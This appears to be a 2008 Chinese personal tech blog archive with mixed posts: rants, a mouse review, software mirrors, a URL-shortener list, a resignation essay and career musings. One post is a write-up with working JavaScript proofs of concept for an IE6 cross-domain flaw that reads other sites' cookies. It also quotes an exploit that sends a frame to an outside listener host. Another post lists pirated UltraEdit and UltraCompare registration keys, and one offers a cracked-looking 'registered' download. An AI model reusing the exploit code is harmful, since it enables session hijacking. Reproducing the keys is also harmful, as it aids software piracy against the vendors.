你们全家都是国家队的!

愤青又要发表不满了!

先发个奖吧,史上最难用,最垃圾,最弱智的信息管理系统评选结果今天揭晓:

http://www.miibeian.gov.cn/

以毫无悬念,并且大幅领先其他任何系统的优势取得冠军!

我就Faint!

我04年第一次注册域名的时候,中国还没有网站备案这个说法。

后来,好像是05年吧,听说都要备案,而且我用的是国内的虚拟主机,服务商也要求备案,那就备吧。

费了半天劲,在那个工业和信息化部(以下简称XX部)的备案系统上提交了个人和网站信息,那个时候填写的是上海的一家主机提供商的信息。一个多月以后,给发了个ICP备案编号,和一个文件。

后来好久没搞新域名,也就没管他。

最近要给新的网站备案,登进去那个XX部的系统,左边导航就那么几个按钮:

  1. 信息录入,告诉我已经录入,不能再录
  2. 信息修改,告诉我找服务商修改,我想骂人了,我现在自己租的服务器,在上面添加个网站,还要找服务商去修改我的信息?也不知道这个规定是哪个SB想出来的?

更Faint的是,我去服务商的备案系统里,一堆没用的内容填写完了,让我在一个下拉列表里选IP,然后那个列表是空的,什么都没有,我选个毛啊!不选就不让我过。

怎么TMD这信息系统跟ZF有点关系的,就这么垃圾没法用呢?

我手里的域名多了,网站也多了,没有一个备案的。不是我不备,是GCD的破JB备案系统不让我备。过两天查到我这儿还得封我的网站。

还TM让不让人活了????

你们干公务员的搞IT的人怎么就那么SB呢?你们丫用不用别人的系统啊?你们丫听说过什么叫Web2.0么?你们丫用自己开发的系统的时候,没有想骂人想打人的冲动么?你们丫怎么跟中国男足一样SB呢?

我发现中国的组织里,跟国字沾点变的都TM特SB。

前2天看见一个兄弟的MSN签名这样写的:“你哥才是国家队的呢,你们全家都是国家队的!”

现在国家队已经成为脏话骂人话了,呵呵,真滑稽。

 

 

Tags:

浏览器 跨域 安全

    Manuel Caballero大牛在这次的BLUEHAT大会上讲了一个叫A Resident in My Domain
的议题,字面上的意思就是驻留在自己的域,随后开始有牛人在自己BLOG上写了一些相关的
内容,这段时间一直和HI群里的朋友在讨论这个问题,大家都简称为鬼页,这个鬼页非常神奇,
可以跟随你浏览的每个页面。经过鬼页的启发,我也对浏览器的跨域安全问题进行了测试。

1.来自伪协议的呼唤

    JAVASCRIPT里大家都频繁使用window对象,window对象代表的就是浏览器的窗口,我们
就来测试下window对象的open方法,尝试让新开的窗口执行伪协议。

    在本机搭建一个WEB服务器,开始做下实验:

    用各个浏览器浏览 http://127.0.0.1/test.htm ,下面是test.htm的脚本内容:

    <script>  
    x=window.open(‘about:blank’);
    x.location=”javascript:alert(document.domain)”
    </script>

    结果是:

    IE6:执行了伪协议,认为弹出窗口的域是127.0.0.1。
    IE7:执行了伪协议,认为弹出窗口的域是127.0.0.1。
    Firefox:执行了伪协议,认为还没有域为NULL。

    Firefox这里对于这个接口可能也有个BUG,对于IP地址的弹窗Firefox没有辨认出域,但
是在实际绑定域名的情况下还是辨认出了域。

    为了下面的部分方便理解,我把这里弹窗的关系给简称下,原来的窗口叫父页,弹出窗口
叫子页,实验过后我们证明了:

    父页和子页都在同一个域里,父页可以重定向子页的URL地址,甚至执行伪协议。

2.父页和子页的关系

    如果父页让子页访问其他域后,父页和子页是否就脱离关系了呢?

    继续测试,用各个浏览器浏览 http://127.0.0.1/test2.htm ,下面是test2.htm的脚本
内容:

    <script>  
    x=window.open(‘about:blank’);
    x.location=”http://www.163.com” //访问163网站
    setTimeout(function(){
        x.location=”http://127.0.0.1″;
    },5000)  //5秒后重定向到127.0.0.1
    </script>

    这次IE6、IE7、Firefox都达成了一致,实验的结果是子页访问了163网站,5秒然后又跳
回了127.0.0.1。

    所以就算是子页在访问了其他域后,还是会受父页的控制。

3.域与域之间的牵绊

    如果父页让子页访问某个域后,再执行伪协议会有什么效果?

    用各个浏览器浏览 http://127.0.0.1/test3.htm,下面是test3.htm的脚本内容:

    <script>  
    x=window.open(‘about:blank’);
    x.location=”http://www.163.com”
    setTimeout(function(){
        x.location=”javascript:alert(document.cookie)”;
    },5000)
    </script>

    结果是:

    IE6:没有反应。
    IE7:报错,拒绝访问。
    Firefox:报错,alert没有定义。

    这些信息明显的说明,如果子页和父页不在同一个域里,浏览器是不允许父页控制子页
执行伪协议脚本的。

    为了进一步验证,我们让子页打开同一个域里的页面测试:

    用各个浏览器浏览 http://127.0.0.1/test4.htm,下面是test4.htm的脚本内容:

    <script>
    document.cookie=’xss:true’  //给本域设置一个COOKIE为xss:true
    x=window.open(‘about:blank’);
    x.location=”http://127.0.0.1″
    setTimeout(function(){
        x.location=”javascript:alert(document.cookie)”;
    },5000)
    </script>

    结果IE6、IE7、Firefox都顺利的弹出了COOKIE值,说明如果子页和父页在同一个域里,
浏览器是允许父页控制子页执行伪协议脚本的。

4.安全上的差异

    父页和子页这种微妙的关系,到这里就开始引发安全问题了,PDP等大牛在分析鬼页的时
候给出了EXP:

    javascript:x=open(‘http://hackademix.net/’);setInterval(function(){try{x.frames[0].location={toString:function(){return ‘http://www.sirdarckcat.net/caballero-listener.html’;}}}catch(e){}},5000);void(1);

    EXP按上面三部分的概念解释是:

    父页是A域,父页指定子页访问B域内一个带框架的页面,父页就能够控制B域页面内框架
的URL地址,这个就是典型的跨域操作了。

    鬼页能够跨域操作框架的关键是window.frames[0]方法没有受到域的限制,第二个是让
location指定的地址看起来像个对象而不是参数。

    我们按照鬼页的思路,继续在第3部分的基础上测试下去,将location指定的地址使用
new String()对象处理。

    用各个浏览器浏览 http://127.0.0.1/test5.htm,下面是test5.htm的脚本内容:

    <script>  
    x=window.open(‘about:blank’);
    x.location=”http://www.163.com”;
    setTimeout(function(){
        x.location=new String(“javascript:alert(document.cookie)”)
    },5000)
    </script>

    IE6:弹出COOKIE。
    IE7:报错,拒绝访问。
    Firefox:报错,alert没有定义。

    结果是IE6奇迹般的弹出了COOKIE,我们做到了跨域执行脚本。

5.灾难性的后果

    到这里我们发现了一个IE6的0DAY,一定程度上这个跨域安全问题是灾难性的,如下面的
EXP:

    <a href=””>IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open(‘http://www.phpwind.net’);
        setTimeout(function(){
            x.location=new String(“javascript:alert(document.cookie)”)
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document.links.length;i++) {
            document.links[i].href=”javascript:win()”
        }
    }
    </script>

    点击链接后,马上得到了PHPWIND论坛的COOKIE,这就意味着黑客通过类似的攻击可以得
到你访问过的任意网站的COOKIE,然后劫持你的会话。

    这样的漏洞相当于一个没有域限制的XSS漏洞,几乎是无法防御的,网站只能进一步的加
强客户端的会话安全,如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的
请求操作加上水印等。

6.总结

    这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不
同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似
数据类型的限制,导致最后绕过限制跨域执行了脚本。

    从这个漏洞我们也可以看出IE7的一些新的安全特性,通过继承关系的window对象操作
来跨域执行脚本伪协议最后是判断了域的,IE7已经开始防范类似的攻击。

    但是这里并没有在本质上解决跨域安全问题,IE7只防范了跨域执行脚本,对于其他跨域
的操作仍然是放行的,所以鬼页在IE7下可以跨域操作框架URL,而Firefox却没有存在相同的
问题,说明不同浏览器在安全的考虑上也是存在很多差异的。

    针对IE我又测试了其他对象方法,发现很多都被限制住了,但不排除还有同样的问题存
在。按照类似的思路,大家可以继续尝试挖掘浏览器的一些跨域漏洞。

    最后感谢HI群里共同讨论的朋友。

7.参考

[1] Browser’s Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

Tags: , , , , , ,

正则表达式 测试工具 Regex Buddy 3.10

http://www.leakon.com/archives/139 提到了这个工具,版本比较旧,而且用诺顿查毒,发现破解程序含有恶意代码。

我从网上又找到了新的版本,这回没有病毒了,而且是直接安装,就是注册版的了。

下载 Regex Buddy 3.10

版本是3.10,欢迎大家下载。

Tags:

罗技 V450 Nano Logitech 无线 鼠标

上周买了 罗技 V450 Nano 。

我很喜欢用无线鼠标,没有线的牵绊,感觉自由了很多。

自从罗技出了 Vx Nano ,我第一次见识了接收器还可以做得那么小。这个设计的确是满足了很多使用无线鼠标用户的需求。

可是 Vx Nano 太贵了,标价要600多,淘宝上也要580左右。实在是买不起。

正巧,最近我一直在用的微软 Laser Mouse Notebook 6000 坏了。说起这个微软,真让人挺寒心的。这鼠标刚出的时候,售价也是599。去中关村转了半天,才在一家专卖鼠标的店里,花510买入。

买回家第一天使用,就发现左键按钮不太灵敏,现象是按了左键,听到咔嗒的声音,但实际上没有产生点击的效果。说白了就是微动开关不灵敏。每次都要非常用力地按下去才可以。

最近,这个按钮越发地不好使,右键也开始不好用了,我实在受不了,就决定换一个。

对了,还要补充一点,微软的那个鼠标,说是激光的,但一点都不好用,在床上用的时候,经常是无法移动光标。这个激光引擎对移动表面非常挑剔。还不如之前的那个微软极动鲨的红光引擎好用。

不过这鼠标有一点好,就是省电,只要一块5号电池,每天使用8个小时以上,至少可以撑2个月。很赞了。

回到正题,最近就开始寻找新鼠标。

有了微软的经历,我是肯定不会再买微软鼠标了。微软的东西确实有些是中看不中用。

正巧看到新闻说罗技新出了 V450 Nano ,而且是小接收器!预计售价是499。

还是有点贵,于是到处找,看有没有工包卖。

结果发现在鼎好二期地下一层有一家叫什么“廖”什么的商城,说有 V450 Nano 的工包卖,售价279。

哇,真是太好啦,这个价格勉强可以接受,于是周末我和Yoyo直接过去看了看。

老板直接给我拿出一个用塑料袋包好的鼠标,告诉我是 V450 Nano,我看了看外观,发现有一个奇怪的地方,接收器的收槽在鼠标底部,而且是很大的一个,Nano的接收器那么小,居然配这么大一个槽,有些不解。

本来要掏钱了,由于有微软鼠标按键不好用的阴影,我要求老板让我现场试用一下。

感谢上帝当时没有让我一时冲动给钱就走,幸亏试了试,那个工包鼠标,按键跟我那个微软一样,微动开关严重不好用,甚至还不如我那个微软的,当着老板的面,点了好几下,都有咔嗒的声音,但光标就是没反应,非常用力地按下去,才产生了点击效果。

于是我问老板,还有没有货了,给我换一个试试吧。老板脸色马上不一样了,跟我说,你换其他的型号吧,这型号的都这样。

我靠!来的时候还跟我保证,罗技的鼠标质量绝无问题,工包质量绝无问题。唉,差点就上了一当啊!

立刻转身走了。

回家上网一查,证实了我关于接收器插槽的怀疑。

下面这张图,是那个老板的号称 “V450 Nano” 的鼠标,注意那个槽:

下面是真正的 V450 Nano:

Nano 的接收器,都是放在后盖里面的。

真是好险啊!

不过通过这个老板,我发现了2件事,也算很有收获。

1、老板给我的,是V450,大接收器的那款,但事实证明,V450可以用2种接收器,大小通用;
2、工包鼠标不能买,老板会告诉你工包是水货或是其他途径的,质量没问题,其实不是这样的,通常都是厂家把残次品销毁的时候,被内部人搞出来,在低端市场销售的,如果你只在乎价格,东西不好用都没关系,那就可以买,至少能买个牌子货,如果你很在乎鼠标的质量,还是去买行货吧。

当天在中关村各家问,都没有行货,说没到货,真是急死人。

过了2、3天,在淘宝上看,突然发现好多家都已经开卖了,问了才知道,是周三刚到货。立刻拍下一个,385。在淘宝付款后,直接去柜台拿货。

行货,质保三年。

拿回公司马上试用,行货真的不一样,鼠标按键非常好用,轻点一下,立刻有反应,以前的问题再也没有出现过。鼠标激光引擎适应力很强,除了在玻璃上不能用,在无鼠标垫的桌子上,在身上,在座椅上,都控制自如。而且无线信号不错,离开座位超过3米,已经看不见光标的位置,中间还隔了一道工位的隔板,还能用滚轮上下滚动网页,还能用光标圈选文字。

太好用了。

这鼠标还有底部开关,不用的时候可以直接关闭电源,不像微软的那个,必须把接收器收起来才能断电。

看来罗技才是鼠标界真正的行家,术业有专攻啊!

http://auction1.taobao.com/auction/item_detail-0db2-abd557c6a9ed0c0bbcf6181736b8cc8a.jhtml

我在这家买的,老板人不错,专卖罗技鼠标,感谢这样的商家,可以让我在第一时间,用合理的价格买到称心的鼠标。

另:大家买数码产品,先到淘宝看看底价再出售,像罗技鼠标这样的产品,都是全新塑封的,不必担心有奸商动过手脚。可以放心购买网上的东西。价格很便宜哦。

Tags: , , ,

TortoiseSVN 1.5.0.13316

今天打开 SVN 客户端,从 GoogleCode 同步代码,软件提示 TortoiseSVN 已经发布了最新的 1.5.0.13316 版。

于是到 http://tortoisesvn.net/downloads 去下载,可是点击下载链接后,浏览器等待了1分钟之后,返回无法链接的错误信息,反复下载都是不行。

于是去 Google 搜索,看有没有其他镜像站点提供下载。

找到一个镜像站,上面写着 http://www.sourceforge.net/ 被屏蔽了……

万恶的 ZF !我就不明白一个开源项目平台网站,会有什么反动的信息?会有什么危害国家安全的内容?会有什么影响青少年成长的内容?

即便是有,也是沧海一粟,为了屏蔽这微不足道的一点点内容,可以放弃那成百上千倍的精华?

同样的例子就像维基百科。

你们看看现在的青少年每天都在看些什么?都在想些什么?除了日本的游戏、漫画,他们还热衷于什么呢?一问三不知,慢慢的连生活自理能力都没有了。知识的极度匮乏,想获取知识的时候,只能利用国内那一点点被人转来转去的枪手文章,这里面充斥着各种各样查无实据的内容,在一遍又一遍地误导着新一代的中国人。

还有,在网上能搜到的,就是一堆娱乐新闻,一堆成功名人的传奇经历。稍微有些社会经验的人,都明白这些内容都是搞公关的人写的软文。可正是这样的内容,深深地印刻在年轻人心里。文章里把一个普通的人描写得出神入化,描写得像神一样。而普通的读者,会拿这些内容和自身做对比。有一点比不上,就会产生自卑的心理。

现在很多很多,甚至是绝大部分年轻人都很自卑。

有人想过这是为什么吗?当一个人拿自己的能力与他所崇拜的人相比时,如果差距过大,那必然会产生自卑的感觉。这个浮躁的社会和软文充斥的信息媒体世界,把被宣传对象的能力和事迹描绘得近乎完美。面对这些枪手内容,谁不会产生自卑的感觉呢?

话题扯远了,我只是觉得外面的很多内容都是很真实,很精彩,只是被我们伟大英明的 ZF 都过滤掉了。ZF 的媒体只要让老百姓知道 ZF 是最廉洁、最公正、最伟大的就可以了,其他的内容,不该让老百姓了解。

可怜的中国人民。

回到正题,在国内没法下载软件,还好我有美国的服务器。虽然是虚拟主机,但我可以使用自己开发的 web shell ,去wget 一个 url。

十几秒,18M 的文件就下载回来啦。

给大家提供下载:

http://down.leakon.com/software/2008/06/TortoiseSVN-1.5.0.13316-win32-svn-1.5.0.msi

文件大小:18652672 字节
MD5:f0baca3df25209b292e2bcfe74ea87e0
SHA1:9ae8e5d9666967fd18764fc244bc3dc352e992a1

这里提供了文件大小和内容签名,保证文件是从官方地址下载的,绝无更改。

目前中国的互联网环境十分恶劣,大家下载软件的时候,尽量去官方地址下载,如果官方网站下载很慢,可以选国内较大的下载站,下回来后,记得用 md5sum 或 sha1sum 验证一下签名,是否与官方提供的严格一致。

如果不一致,千万不要使用,因为好多下载站与流氓软件或黑客组织有利益关系,会在文件中附加恶意代码。

这 2 个签名软件,我会尽快找找 windows 版的,给大家提供下载。

其实,如果大家装了 Cygwin ,就可以在 windows 环境使用与 Linux 一样的界面,包括一些默认安装的软件,就包括 md5sum 和 sha1sum。

http://down.leakon.com/software/2007/08/Cygwin.zip

Tags: ,

九大网址缩短服务推荐

面对长长的网址,我们常常会感到头疼,怎么记得住!!web2.0的时代提供给大家一类非常实用的服务:网址缩短服务(short URL),这类服务通常可以免费使用,不需要注册等等麻烦,立刻可将你长长的网址缩短成通俗易记的网址,便于你自己和朋友牢牢记住,方便你的使用。

相信大家对这类服务并不陌生,在你的收藏夹里肯定有几个这类的服务。前天看到一篇很好的日志:10 Short URL Services Face Off!,推荐了10个很棒的网址缩短服务,今天翻译后加一点自己的看法,推荐给大家!(原文共推荐了10个服务,但测试中发现有一个无法访问)

 

 

说明:本文均以http://enjoyweb20.cn/index.php/2008/06/hippopost/ 作为测试网址。

 

1、TinyURL

TinyURL可能是大家最熟悉,也使用得最多的免费域名转向服务,速度很快,缩短后短小网址有六个字符组成,形式为:http://tinyurl.com/123456 ,但不能自己进行设置。

 

2、is.gd

is.gd 缩短后网址更短,本次测试结果http://is.gd/zjP,共9个字符,缩短比率达67%。还有一大特点就是带有网址自动复制功能,启动该功能,鼠标划过即自动复制网址,尤其是用于缩短下载文件的网址,划过即刻自动下载。

 

3、URL.ie

URL.ie 也是简单的缩短网址服务,长长的网址可缩短为个性的3个字符,并带有Firefox 浏览器插件工具。

 

4、EasyURL

EasyURL 简单地输入长长的网址,点击缩短网址就大功告成了!比较大的优势在于可以自己定义缩短网址域名,也就是说缩短后网址除了后缀,可以个性化域名,更有利于记忆!

 

 5、jmp2.net

jmp2.net 除了具有一般的缩短网址功能,一大特点是可以设置是否网址区域隐藏,可将你的网址掩蔽。另外也具有Firefox浏览器插件。

 

6、w3t.org

w3t.org 的特点是带有“tag”功能,可以自己定义缩短网址的tag,最多10个字符。我的理解是也就是可以自己定义缩短网址的个性化域名。

 

 7、xaddr.com

xaddr.com 在线缩短网址服务并没有什么特色,但却是唯一具有客户端软件下载的服务,如果你有很多网址需要批量缩短,安装客户端软件后会非常方便。

 

 8、doiop.com

doiop.com 的特点是在缩短网址是你可以自己设置域名,不仅仅可选用字符,也可设置成某一个词组,但是时常会有域名已被使用的烦恼。

 

 9、Snurl / Snipr / SnipURL

总是喜欢把好的留到最后,Snurl / Snipr / SnipURL 无疑是此类服务中功能比较强的一个。不仅可以个性化缩短网址,设置密码保护,注册为用户后还可以随时管理你所有的缩短网址,甚至其他朋友可以通过RSS的方式订阅你缩短后的网址。

 

原文地址:http://enjoyweb20.cn/index.php/2008/06/shorturl/

Tags: ,

转 辞职是最人道主义的关怀

在中国供应商的人堆里:

我只是那个说了真话太不懂事的孩子。
我只是用正常人类的脑子去想了想。

我只是常想用批评来告诉你们不要这样,不要这样。

我只是——不想和你们同流合污,不想让我初恋情人般的事业被你们这么糟蹋了,24个月前,本来以为奋斗很好玩,24个月后,却被奋斗玩了。

天作孽尤可为,自作孽,不可活。这些年,你们干了什么,你们干了什么,你们干了什么……会员运营都那样牛逼了,你们还什么都做不了,在这个行业,假装一个人类是多么的容易,还想借一起离职的哥们姐们的话:谢天谢地谢中供。

我从24个月前一个傻瓜一样的奋斗青年,抡着膀子为中国供应商干劲十足的干活,特赤子地写《中国供应商运营规划》,到特建设地闷在一堆数据里分析技巧和手段,到故做深沉地书写《中国供应商远景运营分析》论证这个行业,到现在,咧着嘴玩世不恭地写着杂文,因为我已不把中国供应商当成事业了,它是我论证行业负面的靶场。反思什么?总结什么?建议什么?别跟我说正面主流这些我玩剩下的词了,我帮你们反思了好久总结了好久建议了好久,可你们不听,弹一弹顶上的帽子,坐而论道去了。

中国供应商是中国社会一个特殊现象,Q是中国商人中的特殊现象,会员运营的全体同仁是人类的特殊现象。

都够牛逼的了。

现在,我们集体辞职了,中国供应商到今天并不是你一个人的错,就像不是XXX、XXX的错,但你们是重要的符号,是产品体制的具体延伸,辞职,是对你最人道主义的关怀。

不是总想“风沙”我吗,突然想起,在我24个月的中供生涯里,总共被“风沙”了几十次,现在你们解脱了,不用“风沙”我了,我也解脱了,那一场风花雪月的事,那一场暴虐的沙尘暴,结束了。

而我可以不再为中国供应商那点破事殚精竭虑了,不值得,不值得,你们放下屠刀,立地成佛,我转身向海,春暖花开。

洗洗吧,睡睡吧,生活总要继续,无论有没有你我。

UltraEdit 14.00b UltraCompare Pro 5.10 注册码

今天终于有些时间去更新常用的软件。

UltraEdit是我最喜欢的编辑器,速度快,而且查找替换功能强,辅助功能很多。

唯一一个有问题的是,我这个13.10的版本,对中文字符串的查找有些问题,经常出错。

下了14.00b,感觉改变了不少,中文查找的问题彻底解决了。

以前版本的还有另一个问题,就是使用时间长了以后,Windows系统的复制粘贴剪贴板,不能与UltraEdit通信了,我在记事本复制的字符串,在UE下没法粘贴,vice versa。

由于这个Bug的复现规律我还没发现,只能过段时间再来汇报了~~

大家还是去官方网站下载吧:

英文版:http://www.ultraedit.com/files/ue_english.zip

中文版:http://www.ultraedit.com/files/ue_chinese.zip

注册码:

bbs.kafan.cn
LGDFC-JHRHT-RRHLK-NKBMQ-KLCIC-KEOHS-MREDF-JLBPY

cnc001
JFEKI-JJRGC-SRHGT-RQIUR-JEBEK-LILGW-NPIDP-OJHPB

我的另一个超级工具,就是UltraCompare Pro。

这是个文件对比工具,非常好用,对比结果很直观。

现在我每次开发的程序上线,都要拿新代码和线上服务器的代码做对比,把每处改动再过一遍脑子,确保代码不会有问题。

这样以后,再做上线就特别放心,绝对不会出现意外。

注册码:(我是从5.0升级的,以前的注册码仍然可用)

crsky com
H3G8Y-U0B1Z-P1W2B-G3J8D-70134-42H6o

GREENDOWN
I0Z0Q-H2T4L-E0C9V-F7T0N

www.orsoon.com
I3Q6R-L0P3F-F8W2F-K3U7D-HU836-D3L3x

还是推荐大家去官网下载:

多语言版:http://www.ultraedit.com/files/uc5.zip

Tags: ,

我现在该做什么 迷茫……

好久没有写Blog,因为好朋友离开公司,一下变得很忙。

他临走的时候,我才知道他以前有很多传奇一样的故事。

他长大的城市,有80万人,他是他们市第一个考上北大的人。

他的成绩是全省前10名。

他的成绩,在他的高中,至今无人可以超过。

全国同样的一套高考试卷,总分750,他可以考710多。

现在刚刚过去的08年高考,让我回忆起我高考的时候。

不知道每个考生都什么感觉,有悲有喜吧。

我很佩服那些由于发挥失常,下决心复读一年的考生。

复读,对我来说,就好像勾践卧薪尝胆一样,我担心自己有没有毅力坚持默默地付出比别人多一年的时间和辛苦。

我很幸运,高考的时候正常发挥,能够进入一所本科大学。

和我的同事没法比,他进的是北大,而且读了研究生。

其实,学校之间的差距,还是很大的。

从北大出来的,基本上都是牛人。

我以前去过一家公司面试,是国内比较知名的互联网公司,给我面试的是他们技术总监。

后来才知道,这个总监,是我同事的大学同班同学。

事实就是地说,学知识,学校之间的差距并不大,只要你努力,在哪里都可以学得很好,很出色。

有所不同的,只是人脉关系不一样。这种环境的差别,对人的影响还是蛮大的。

周围都是出色的朋友,必然会激励你更加努力。周围都是吃吃喝喝的朋友,只会锻炼你吹牛和喝酒的能力。

说远了,同事的离开,让我一下不知道该怎么做。

他特别聪明。

每次我在做项目开发时遇到难题,都要想好久好久才能憋出一个事倍功半的方案,而问问他怎么做,立刻就能给我一个事半功倍,简单容易的方法。

有他在,我就不怕遇到搞不定的问题。

现在他走了,我很担心,如果再遇到什么问题,我该怎么办。(迷茫一)

最近在做百度之星程序设计大赛,本来是2个人一起负责的项目,现在也只有我一个人在负责了。

初赛刚刚完成,评分过程中就出过一些问题。我想,如果他在,就不会是这个样子。

周末就要复赛了,但愿我能提前发现所有的问题,别因为我,影响了百度的名声。

说起程序大赛,让我感触特别深刻。

得分最高的2个人,都是中学生,一个90年,一个91年的。

一个是100分,一个是98分。

我18岁的时候,还只会聊QQ,都不知道什么叫C语言。

由于工作性质和工作环境的原因,我一直比较注重的,是开发框架。而算法和数据结构,是我很弱很弱的项目。

等于是两个方向吧,我在钻研的,是如何让人的工作效率更高,而研究算法的,是钻研如何让机器工作效率更高。

虽然自己可以给自己找个好听点的借口,但C语言、数据结构和算法,这是一个搞开发的人最起码的基本要求。

开发框架,我已经钻研了一年多,我不想半途而废。

C语言数据结构和算法,我也想重新捡起来,但我可支配的自由时间很少,精力放在这上面,其他方面就会受到影响。

我真的不知道,现在应该怎么办。(迷茫二)

我很想做成一件事,很想做好一个网站,实现自己创业的梦想。从最开始有想法,到现在,已经有2年了。一个是工作太忙,一个是能力不足,因此到现在仍未有实质性进展。不过产品设计文档,已经积攒了好多好多,如果都能实现,相信也会是一个很受欢迎的产品。

我现在有了一份还算不错的工作,在工作中可以不断学习,锻炼自己的各种能力。不过就是很忙,而且,有时候忙得都是一些毫无技术含量的体力活。再小的公司,也有自己领先的地方;再大的公司,也有自己薄弱的环节。

我是一个追求完美的人,有时候不得不做一些不完美的事,我的心情,也会经常受到影响。

我能怎么做呢?暂时搁置自己的梦想,为了继续学习,为了每个月的薪水,把时间都交给公司?

或者,放弃挺不容易得到的工作,孤注一掷地为了一个似乎是理想主义的想法而选择创业?

两种选择其中的任何一种,如果失败,付出的代价,都是我难以接受的。

我现在改怎么办呢?(迷茫三)

还有很多做事的方法问题。

这个世界真的很奇怪,我们从小接受的教育,就是要把每一件事都做到最好。

但达到最好,所要付出的成本,却异常高昂。

相信每个人都能看到身边有很多例子。

不知道您现在是用什么浏览器看我的Blog,大多数人都是IE吧。做前端开发,尤其是做CSS和JavaScript开发的人都知道,用“垃圾”来形容IE,都有损“垃圾”这个词。

但IE的市场占有率,连零头都是FireFox的好几倍。Firefox在各方面都做得更好,可它并不流行。

实事求是地说,百度和谷歌比起来,在技术上没有什么优势,但在中国,谷歌就是拼不过百度。

在各个知名大公司做开发的牛牛工程师们,有的精通C++,有的精通算法、数据结构,有的精通设计模式、系统架构。

但大部分这些人,没有做流氓软件的小程序员们挣钱多。

例子就这么多,也许其中有一些没有可比性,或者还有一些其他原因,是我没有看到的,但我所说的类似的现象,肯定是有不少。

有时候,我们用传统的做事方法,达不到我们期望的效果。

不是报怨,只是发现问题,我更倾向于从自己身上找原因。也许我有点书呆子的个性,或者就是笨+死心眼。我想改变这样的状态,我想知道真正的原因到底是什么。(迷茫四)

我有太多的迷茫,只有太少的时间,和一个很笨的脑袋。

不过我有一个“天真”的理想:如果大家都能互相共享经验,分享心得,一起努力,在各自的领域努力实现各自的梦想就好了。

Tags: